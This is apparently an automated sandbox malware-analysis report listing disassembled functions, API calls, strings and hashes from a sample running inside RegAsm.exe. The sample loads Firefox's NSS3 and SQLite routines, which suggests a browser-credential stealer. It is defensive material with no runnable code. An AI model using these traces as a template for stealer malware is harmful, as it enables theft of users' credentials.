                                                                                • Instruction ID: ea9a1a63cc27e4b1fedb8382391619655fdb548fd16d45622b3554ec6da0dabc
                                                                                • Opcode Fuzzy Hash: 20b5f8396f51f1ef8bf0f4ba5998784b6f83f6acbc3ba4ada33b989b8559e0cb
                                                                                • Instruction Fuzzy Hash: B9213D72A0020267EF245B28ED09A9A3A74DB6231DF054531ED1CC2713F73AD969D7E1
                                                                                APIs
                                                                                • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A7E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6C85B999), ref: 6C85CFF3
                                                                                • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000109DA,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6C85B999), ref: 6C85D02B
                                                                                • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A70,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,00000000,?,?,6C85B999), ref: 6C85D041
                                                                                • _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6C85B999), ref: 6C9A972B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_log$_byteswap_ushort
                                                                                • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                • API String ID: 491875419-598938438
                                                                                • Opcode ID: b06d00ef4b2123e2c6c90ae697823b87e33bf41bc39a2467904d0f8b3707b058
                                                                                • Instruction ID: 0eb632256edfdfa5e2418bb3b91f2d207572d09bd695674007329adc0f7b45f7
                                                                                • Opcode Fuzzy Hash: b06d00ef4b2123e2c6c90ae697823b87e33bf41bc39a2467904d0f8b3707b058
                                                                                • Instruction Fuzzy Hash: 26613671A042108FD3208F29C940BA6BBF5FF55318F58856DE4499BB82E3B7D847C7A1
                                                                                APIs
                                                                                • CreateDCA.GDI32(00000000,00000000,00000000,00000001), ref: 004103B5
                                                                                • GetDeviceCaps.GDI32(00000000,00000008), ref: 004103C0
                                                                                • GetDeviceCaps.GDI32(00000000,0000000A), ref: 004103CB
                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 004103D6
                                                                                • GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,?,?,00414CC0,?,00000000,?,Display Resolution: ,00000000,?,00426678,00000000,?), ref: 004103E2
                                                                                • HeapAlloc.KERNEL32(00000000,?,00000000,?,?,00414CC0,?,00000000,?,Display Resolution: ,00000000,?,00426678,00000000,?,00000000), ref: 004103E9
                                                                                • wsprintfA.USER32 ref: 004103FB
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CapsDeviceHeap$AllocCreateProcessReleaselstrcpywsprintf
                                                                                • String ID: %dx%d
                                                                                • API String ID: 3940144428-2206825331
                                                                                • Opcode ID: b8d7bca2d2f12ff90ba38a1e8a59390212395579c896a9438ed413e6516ca11a
                                                                                • Instruction ID: a5561a93a22769e98eddca292aca24bf0ee440d6a8de822d8c1c0f2786625d1a
                                                                                • Opcode Fuzzy Hash: b8d7bca2d2f12ff90ba38a1e8a59390212395579c896a9438ed413e6516ca11a
                                                                                • Instruction Fuzzy Hash: D5F0AD35A01224FBE7106BA1AC0DE9F7E6DFF4ABA1F001029FA0193150D6B5490187B4
                                                                                APIs
                                                                                • memcpy.VCRUNTIME140(?,00000100,?), ref: 6C91CD08
                                                                                • PK11_DoesMechanism.NSS3(?,?), ref: 6C91CE16
                                                                                • PR_SetError.NSS3(00000000,00000000), ref: 6C91D079
                                                                                  • Part of subcall function 6C97C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C97C2BF
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: DoesErrorK11_MechanismValuememcpy
                                                                                • String ID:
                                                                                • API String ID: 1351604052-0
                                                                                • Opcode ID: 3736999e3c36fcc2431c19ee98805a41acfdbabe62a3c02905789c16dab91c35
                                                                                • Instruction ID: 400f75559e7ebf728fe1bf75f0ec4ff41b6bb7709ad1aae85fd8205cc2cfff19
                                                                                • Opcode Fuzzy Hash: 3736999e3c36fcc2431c19ee98805a41acfdbabe62a3c02905789c16dab91c35
                                                                                • Instruction Fuzzy Hash: 65C18DB1A042199FDB21CF24CC81BDAB7B8AF58318F1441A8D948A7B41E775EE95CF90
                                                                                APIs
                                                                                • PORT_ZAlloc_Util.NSS3(DA5D7AA7), ref: 6C8D2C5D
                                                                                  • Part of subcall function 6C930D30: calloc.MOZGLUE ref: 6C930D50
                                                                                  • Part of subcall function 6C930D30: TlsGetValue.KERNEL32 ref: 6C930D6D
                                                                                • CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001), ref: 6C8D2C8D
                                                                                • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C8D2CE0
                                                                                  • Part of subcall function 6C8D2E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C8D2CDA,?,00000000), ref: 6C8D2E1E
                                                                                  • Part of subcall function 6C8D2E00: SECITEM_DupItem_Util.NSS3(?), ref: 6C8D2E33
                                                                                  • Part of subcall function 6C8D2E00: TlsGetValue.KERNEL32 ref: 6C8D2E4E
                                                                                  • Part of subcall function 6C8D2E00: EnterCriticalSection.KERNEL32(?), ref: 6C8D2E5E
                                                                                  • Part of subcall function 6C8D2E00: PL_HashTableLookup.NSS3(?), ref: 6C8D2E71
                                                                                  • Part of subcall function 6C8D2E00: PL_HashTableRemove.NSS3(?), ref: 6C8D2E84
                                                                                  • Part of subcall function 6C8D2E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6C8D2E96
                                                                                  • Part of subcall function 6C8D2E00: PR_Unlock.NSS3 ref: 6C8D2EA9
                                                                                • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C8D2D23
                                                                                • CERT_IsCACert.NSS3(00000001,00000000), ref: 6C8D2D30
                                                                                • CERT_MakeCANickname.NSS3(00000001), ref: 6C8D2D3F
                                                                                • free.MOZGLUE(00000000), ref: 6C8D2D73
                                                                                • CERT_DestroyCertificate.NSS3(?), ref: 6C8D2DB8
                                                                                • free.MOZGLUE ref: 6C8D2DC8
                                                                                  • Part of subcall function 6C8D3E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C8D3EC2
                                                                                  • Part of subcall function 6C8D3E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C8D3ED6
                                                                                  • Part of subcall function 6C8D3E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C8D3EEE
                                                                                  • Part of subcall function 6C8D3E60: PR_CallOnce.NSS3(6CA32AA4,6C9312D0), ref: 6C8D3F02
                                                                                  • Part of subcall function 6C8D3E60: PL_FreeArenaPool.NSS3 ref: 6C8D3F14
                                                                                  • Part of subcall function 6C8D3E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C8D3F27
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Util$Item_$HashTable$ArenaCertificatePoolValueZfreefree$Alloc_CallCertCopyCriticalDecodeDestroyEnterErrorFreeInitLookupMakeNicknameOnceQuickRemoveSectionTempUnlockcalloc
                                                                                • String ID:
                                                                                • API String ID: 3941837925-0
                                                                                • Opcode ID: 3966902a35970883b664e4b9224bce33b2a95a8d7cce818a661286a6374ceef9
                                                                                • Instruction ID: cfa4ffa638fe3f218513e6f918514adf4a882f8176fe4713cbec20f5f669424a
                                                                                • Opcode Fuzzy Hash: 3966902a35970883b664e4b9224bce33b2a95a8d7cce818a661286a6374ceef9
                                                                                • Instruction Fuzzy Hash: 5C51EF71A0431A9BEB209F28DE85B6B77E5AF94349F160838E855C3610EB35FC158B92
                                                                                APIs
                                                                                • VirtualAlloc.KERNEL32(00000000,00003000,00003000,00000004,?,?,?,6C7B31A7), ref: 6C7ECDDD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650238110.000000006C7B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7B0000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650211449.000000006C7B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000002.00000002.2650409954.000000006C82D000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000002.00000002.2650456604.000000006C83E000.00000004.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000002.00000002.2650533178.000000006C842000.00000002.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c7b0000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                                • API String ID: 4275171209-2186867486
                                                                                • Opcode ID: 14a63df60ba495a4384fe51833bb4c5eda227f58d31a8d64e59d70ad6acbd0ee
                                                                                • Instruction ID: c5f619838a3f7cf9fd9660af687f09bb7ca91c02cfb2ed3cd2f1e75e71b63bb2
                                                                                • Opcode Fuzzy Hash: 14a63df60ba495a4384fe51833bb4c5eda227f58d31a8d64e59d70ad6acbd0ee
                                                                                • Instruction Fuzzy Hash: 2031C5767402155BFF20AEE98E45BAE7F79BB4971AF205424F618AB780DB70D800C7E0
                                                                                APIs
                                                                                • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,00000022,?,?,6C93536F,00000022,?,?,00000000,?), ref: 6C934E70
                                                                                • PORT_ZAlloc_Util.NSS3(00000000), ref: 6C934F28
                                                                                • PR_smprintf.NSS3(%s=%s,?,00000000), ref: 6C934F8E
                                                                                • PR_smprintf.NSS3(%s=%c%s%c,?,?,00000000,?), ref: 6C934FAE
                                                                                • free.MOZGLUE(?), ref: 6C934FC8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: R_smprintf$Alloc_Utilfreeisspace
                                                                                • String ID: %s=%c%s%c$%s=%s
                                                                                • API String ID: 2709355791-2032576422
                                                                                • Opcode ID: 9945d424a57ad49c649d7e21d1c2a3bcd6790fb2c0efc368bc7669b6c9730542
                                                                                • Instruction ID: 61d93dcf5820ea85371be2110da08083f51fb867400dd32e39e51178ca61bcc2
                                                                                • Opcode Fuzzy Hash: 9945d424a57ad49c649d7e21d1c2a3bcd6790fb2c0efc368bc7669b6c9730542
                                                                                • Instruction Fuzzy Hash: 24512B31A051768BEB11CA6988507FF7FF99F42308F1A9125E89CA7B81D32AC8558FD1
                                                                                APIs
                                                                                  • Part of subcall function 6C7BF100: LoadLibraryW.KERNEL32(shell32,?,6C82D020), ref: 6C7BF122
                                                                                  • Part of subcall function 6C7BF100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C7BF132
                                                                                • moz_xmalloc.MOZGLUE(00000012), ref: 6C7BED50
                                                                                • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C7BEDAC
                                                                                • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,\Mozilla\Firefox\SkeletonUILock-,00000020,?,00000000), ref: 6C7BEDCC
                                                                                • CreateFileW.KERNEL32 ref: 6C7BEE08
                                                                                • free.MOZGLUE(00000000), ref: 6C7BEE27
                                                                                • free.MOZGLUE(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6C7BEE32
                                                                                  • Part of subcall function 6C7BEB90: moz_xmalloc.MOZGLUE(00000104), ref: 6C7BEBB5
                                                                                  • Part of subcall function 6C7BEB90: memset.VCRUNTIME140(00000000,00000000,00000104,?,?,6C7ED7F3), ref: 6C7BEBC3
                                                                                  • Part of subcall function 6C7BEB90: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,6C7ED7F3), ref: 6C7BEBD6
                                                                                Strings
                                                                                • \Mozilla\Firefox\SkeletonUILock-, xrefs: 6C7BEDC1
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650238110.000000006C7B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7B0000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650211449.000000006C7B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000002.00000002.2650409954.000000006C82D000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000002.00000002.2650456604.000000006C83E000.00000004.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000002.00000002.2650533178.000000006C842000.00000002.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c7b0000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Filefreemoz_xmallocwcslen$AddressCreateLibraryLoadModuleNameProcmemset
                                                                                • String ID: \Mozilla\Firefox\SkeletonUILock-
                                                                                • API String ID: 1980384892-344433685
                                                                                • Opcode ID: b90c58190f6564a183d826457620dcc3b36c42dae99815b7d3de69dc16a05af4
                                                                                • Instruction ID: 1518f206f76e4535bdc5dbd5d506b6b5ee5fc36abe1baa4f54352db1aa119cdc
                                                                                • Opcode Fuzzy Hash: b90c58190f6564a183d826457620dcc3b36c42dae99815b7d3de69dc16a05af4
                                                                                • Instruction Fuzzy Hash: FB51E271D053088BEB10DF68CA496EEB7B4EF59318F04886DE8557B740E774A988C7E2
                                                                                APIs
                                                                                • PR_LogPrint.NSS3(C_MessageDecryptFinal), ref: 6C90ACE6
                                                                                • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C90AD14
                                                                                • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C90AD23
                                                                                  • Part of subcall function 6C9ED930: PL_strncpyz.NSS3(?,?,?), ref: 6C9ED963
                                                                                • PR_LogPrint.NSS3(?,00000000), ref: 6C90AD39
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: L_strncpyzPrint$L_strcatn
                                                                                • String ID: hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageDecryptFinal
                                                                                • API String ID: 332880674-3521875567
                                                                                • Opcode ID: b128f59754a222569ccf7a31cea3eaaeed9ba44b707aaf9192329e13afb496f7
                                                                                • Instruction ID: db96f7d2a6e13a59ad37761d42a7569e5841cd667707e57c1b77517aa62658a0
                                                                                • Opcode Fuzzy Hash: b128f59754a222569ccf7a31cea3eaaeed9ba44b707aaf9192329e13afb496f7
                                                                                • Instruction Fuzzy Hash: A92125317002059FDB259F64AD98B6A77B5AF6270DF048429E40DD7A12DF34D84ACBD2
                                                                                APIs
                                                                                • TlsGetValue.KERNEL32(00000000,00000000,?,6C8F124D,00000001), ref: 6C8E8D19
                                                                                • EnterCriticalSection.KERNEL32(?,?,?,?,6C8F124D,00000001), ref: 6C8E8D32
                                                                                • PL_ArenaRelease.NSS3(?,?,?,?,?,6C8F124D,00000001), ref: 6C8E8D73
                                                                                • PR_Unlock.NSS3(?,?,?,?,?,6C8F124D,00000001), ref: 6C8E8D8C
                                                                                  • Part of subcall function 6C97DD70: TlsGetValue.KERNEL32 ref: 6C97DD8C
                                                                                  • Part of subcall function 6C97DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C97DDB4
                                                                                • PR_Unlock.NSS3(?,?,?,?,?,6C8F124D,00000001), ref: 6C8E8DBA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSectionUnlockValue$ArenaEnterLeaveRelease
                                                                                • String ID: KRAM$KRAM
                                                                                • API String ID: 2419422920-169145855
                                                                                • Opcode ID: 6b57433eb3f4e750d494b034d49305eba9bc7d68f27dba71fefc51a65a7a6f81
                                                                                • Instruction ID: 764a95cec090600b98b7f449acc9c0b1d79e608b83b48faf844364f1f6cf9200
                                                                                • Opcode Fuzzy Hash: 6b57433eb3f4e750d494b034d49305eba9bc7d68f27dba71fefc51a65a7a6f81
                                                                                • Instruction Fuzzy Hash: C4216BB1A046058FCB14EF3CC6846AEB7F0FF9A319F15896AD89897701E734D852CB91
                                                                                APIs
                                                                                • PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6C9E0EE6
                                                                                • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6C9E0EFA
                                                                                  • Part of subcall function 6C8CAEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6C8CAF0E
                                                                                • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C9E0F16
                                                                                • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C9E0F1C
                                                                                • DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C9E0F25
                                                                                • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C9E0F2B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: __acrt_iob_func$BreakDebugPrint__stdio_common_vfprintfabortfflush
                                                                                • String ID: Aborting$Assertion failure: %s, at %s:%d
                                                                                • API String ID: 2948422844-1374795319
                                                                                • Opcode ID: 20e19d202c75cdde251f1ad2b36531628ac0bfd560782ca646d1e69bda8a020b
                                                                                • Instruction ID: 7e838c9773e6a09a346d3f6826f6bf0a7700a3b2332e7baf6e0a7063335c840e
                                                                                • Opcode Fuzzy Hash: 20e19d202c75cdde251f1ad2b36531628ac0bfd560782ca646d1e69bda8a020b
                                                                                • Instruction Fuzzy Hash: FA01D2B5900214BBDF01AFA8DC45CAB3F3CEF46368F044424FD0987701D635EA6097A2
                                                                                APIs
                                                                                  • Part of subcall function 6C7EAB89: EnterCriticalSection.KERNEL32(6C83E370,?,?,?,6C7B34DE,6C83F6CC,?,?,?,?,?,?,?,6C7B3284), ref: 6C7EAB94
                                                                                  • Part of subcall function 6C7EAB89: LeaveCriticalSection.KERNEL32(6C83E370,?,6C7B34DE,6C83F6CC,?,?,?,?,?,?,?,6C7B3284,?,?,6C7D56F6), ref: 6C7EABD1
                                                                                • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C7C4A68), ref: 6C7F945E
                                                                                • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C7F9470
                                                                                • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C7F9482
                                                                                • __Init_thread_footer.LIBCMT ref: 6C7F949F
                                                                                Strings
                                                                                • MOZ_BASE_PROFILER_LOGGING, xrefs: 6C7F947D
                                                                                • MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C7F9459
                                                                                • MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C7F946B
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650238110.000000006C7B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7B0000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650211449.000000006C7B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000002.00000002.2650409954.000000006C82D000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000002.00000002.2650456604.000000006C83E000.00000004.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000002.00000002.2650533178.000000006C842000.00000002.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c7b0000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: getenv$CriticalSection$EnterInit_thread_footerLeave
                                                                                • String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING
                                                                                • API String ID: 4042361484-1628757462
                                                                                • Opcode ID: f631590c756116b26a6ea9a455d97232c877d7af95da0ea312d329812b34915d
                                                                                • Instruction ID: 1bbe9eeeb05464e1ba957bca356e88d302cc95c6c1339e5b3d2cae92c03ab738
                                                                                • Opcode Fuzzy Hash: f631590c756116b26a6ea9a455d97232c877d7af95da0ea312d329812b34915d
                                                                                • Instruction Fuzzy Hash: 9A012830A0011097D7309FDCDB98A5733B49B2632CF042D36D86E86B41D725D856C9DB
                                                                                APIs
                                                                                • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C9A4DC3
                                                                                • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CA4,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C9A4DE0
                                                                                Strings
                                                                                • %s at line %d of [%.10s], xrefs: 6C9A4DDA
                                                                                • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C9A4DCB
                                                                                • invalid, xrefs: 6C9A4DB8
                                                                                • misuse, xrefs: 6C9A4DD5
                                                                                • API call with %s database connection pointer, xrefs: 6C9A4DBD
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmp
